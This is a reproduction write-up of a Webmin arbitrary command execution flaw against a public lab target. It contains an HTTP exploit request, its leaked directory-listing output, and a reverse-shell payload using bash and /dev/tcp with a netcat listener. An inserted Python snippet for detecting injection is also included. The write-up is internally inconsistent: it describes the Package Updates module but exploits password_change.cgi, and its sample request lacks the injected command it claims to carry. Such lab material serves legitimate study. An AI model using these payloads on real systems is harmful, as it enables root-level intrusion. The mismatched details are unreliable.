CVE-2020-35606 Webmin command execution reproduction


Vulnerability details:

This module exploits an arbitrary command execution vulnerability in Webmin 1.962 and lower. Any user authorized for the "Package Updates" module can execute arbitrary commands with root privileges. It arose by circumventing the measures taken for CVE-2019-12840: the escaping `s/\(-)|\(.)/string/g;` is not sufficient to prevent it. Because the package name variable is placed directly in a system command, it can be manipulated with escape characters that HTTP supports. For example, control can be taken by moving the command onto the next line, which is done with the URL-encoded line values "%0A" and "%0C". In addition, for the payload to work, a double ampersand (&&, i.e. %26%26) must be appended at the end of the payload.
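From the defender's side, the point above is that escaping individual characters misses URL-encoded control characters, while an allowlist rejects them by construction. The following is an added example (not code from the original post or from Webmin) that decodes a form body, flags parameter values carrying the %0A/%0C line characters or the `&&`/`|` separators the write-up uses, and applies an assumed allowlist for a package-name parameter; the sample request records are constructed.

```python
import re
from urllib.parse import parse_qsl

# Decoded characters that let a parameter value break out of a command line.
# LF (%0A) and FF (%0C) are the ones the write-up relies on; CR is the
# obvious sibling. "&&" and "|" are the separators seen in the payloads.
CONTROL_CHARS = {"\n": "LF (%0A)", "\x0c": "FF (%0C)", "\r": "CR (%0D)"}
SHELL_META = re.compile(r"&&|\|\||[|;`$]")

# Allowlist for a package-name-style parameter: letters, digits and the
# punctuation real package names use. This is an assumed policy, not
# Webmin's own check; the point is that an allowlist rejects control
# characters by construction instead of trying to escape them away.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+:-]{0,127}")

def is_safe_name(value: str) -> bool:
    """True if the value may be placed in a command as a package name.
    fullmatch is used because a '$'-anchored match accepts a trailing LF."""
    return SAFE_NAME.fullmatch(value) is not None

def find_indicators(body: str) -> list:
    """Decode an application/x-www-form-urlencoded body and report
    (param, reason) pairs for values that carry control characters or
    shell separators. parse_qsl decodes %0A, %0C, %7C and %26 for us."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        for ch, label in CONTROL_CHARS.items():
            if ch in value:
                findings.append((name, f"control char {label}"))
        m = SHELL_META.search(value)
        if m:
            findings.append((name, f"shell metacharacter {m.group(0)!r}"))
    return findings

# Constructed sample records (path, body): the benign body from the write-up
# and two bodies shaped like the injections it describes, using `id` only.
SAMPLE_REQUESTS = [
    ("/password_change.cgi", "user=1&pass=1&expired=2&old=dir&new1=test22&new2=test22"),
    ("/password_change.cgi", "user=1&pass=1&expired=2&old=dir%0Aid%26%26&new1=x&new2=x"),
    ("/password_change.cgi", "u=test%7Cid"),
]

def triage(records=SAMPLE_REQUESTS) -> list:
    """Return (path, findings) for every record whose body has indicators."""
    return [(path, find_indicators(body)) for path, body in records
            if find_indicators(body)]
```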

Reproduction steps:

The exercise is carried out on http://vulfocus.fofa.so/

Target address: https://vulfocus.fofa.so:48998/

POST request:

    POST /password_change.cgi HTTP/1.1
    Host: vulfocus.fofa.so:48998
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 55
    Origin: https://vulfocus.fofa.so:48998
    Connection: close
    Referer: https://vulfocus.fofa.so:48998/
    Cookie: redirect=1; testing=1
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

    user=1&pass=1&expired=2&old=dir&new1=test22&new2=test22

Response (the output of `dir`, injected via the `old` parameter, follows the error message):

    <center><h3>Failed to change password : The current password is incorrectCHANGELOG              config.info.ru.UTF-8      module.info.es.UTF-8
    acl-lib.pl        config.info.ru_RU   module.info.fr
    acl_security.pl        config.info.ru_RU.UTF-8  module.info.fr.UTF-8
    backup_config.pl   config.info.ru_SU   module.info.hu
    cert_form.cgi         config.info.sk                module.info.hu.UTF-8
    cert_issue.cgi         config.info.sk.UTF-8      module.info.it
    cert_output.cgi             config.info.sv                module.info.it.UTF-8
    cgi_args.pl            config.info.sv.UTF-8      module.info.ja_JP.UTF-8
    config                   config.info.tr          module.info.ja_JP.euc
    config-ALL-linux   config.info.uk_UA   module.info.ko_KR.UTF-8
    config-freebsd             config.info.uk_UA.UTF-8  module.info.ko_KR.euc
    config-macos       config.info.zh_CN         module.info.ms_MY
    config-netbsd              config.info.zh_CN.UTF-8  module.info.ms_MY.UTF-8
    config-openbsd           config.info.zh_TW.Big5   module.info.nl
    config-solaris-10-ALL  config.info.zh_TW.UTF-8  module.info.nl.UTF-8
    config-syno-linux convert.cgi            module.info.no
    config.info            convert_form.cgi   module.info.no.UTF-8
    config.info.ar         defaultacl              module.info.pl
    config.info.bg        delete_group.cgi    module.info.pl.UTF-8
    config.info.bg.UTF-8     delete_groups.cgi         module.info.pt
    config.info.ca        delete_session.cgi         module.info.pt.UTF-8
    config.info.ca.UTF-8     delete_user.cgi      module.info.pt_BR
    config.info.cz         delete_users.cgi     module.info.pt_BR.UTF-8
    config.info.cz.UTF-8      edit_acl.cgi            module.info.ru.UTF-8
    config.info.da        edit_group.cgi              module.info.ru_RU
    config.info.da.UTF-8     edit_pass.cgi          module.info.ru_RU.UTF-8
    config.info.de        edit_rbac.cgi          module.info.ru_SU
    config.info.de.UTF-8     edit_sql.cgi            module.info.sk
    config.info.es        edit_sync.cgi          module.info.sk.UTF-8
    config.info.es.UTF-8     edit_unix.cgi          module.info.sv
    config.info.eu        edit_user.cgi          module.info.sv.UTF-8
    config.info.eu.UTF-8     feedback_files.pl    module.info.tr
    config.info.fa         help                      module.info.zh_CN
    config.info.fr         images                  module.info.zh_TW.Big5
    config.info.fr.UTF-8      index.cgi               negativeacl
    config.info.hr        lang                      openssl.cnf
    config.info.hu        list_sessions.cgi     postinstall.pl
    config.info.hu.UTF-8     log_parser.pl         save_acl.cgi
    config.info.it          makedn.cgi           save_group.cgi
    config.info.it.UTF-8       maketables.cgi             save_pass.cgi
    config.info.ja_JP.UTF-8  md5-lib.pl            save_sql.cgi
    config.info.ja_JP.euc     module.info          save_sync.cgi
    config.info.ko_KR.UTF-8  module.info.ar           save_twofactor.cgi
    config.info.ko_KR.euc   module.info.bg             save_unix.cgi
    config.info.ms_MY module.info.bg.UTF-8   save_user.cgi
    config.info.ms_MY.UTF-8  module.info.ca                schema.cgi
    config.info.nl         module.info.ca.UTF-8   switch.cgi
    config.info.nl.UTF-8      module.info.cz              system_info.pl
    config.info.no        module.info.cz.UTF-8    twofactor.pl
    config.info.no.UTF-8     module.info.da             twofactor_form.cgi
    config.info.pl         module.info.da.UTF-8   useradmin_update.pl
    config.info.pl.UTF-8      module.info.de             webmin.schema
    config.info.pt_BR   module.info.de.UTF-8
    config.info.pt_BR.UTF-8  module.info.es
    </h3></center>


Reverse shell

Remote server:

    nc -vvlp 8888

Payload:

    test|bash -c "bash -i >%26 /dev/tcp/xxx.xxx.xxx.xxx/8888 0>%261"

Original post: https://www.cnblogs.com/MonkeyD/p/15622715.html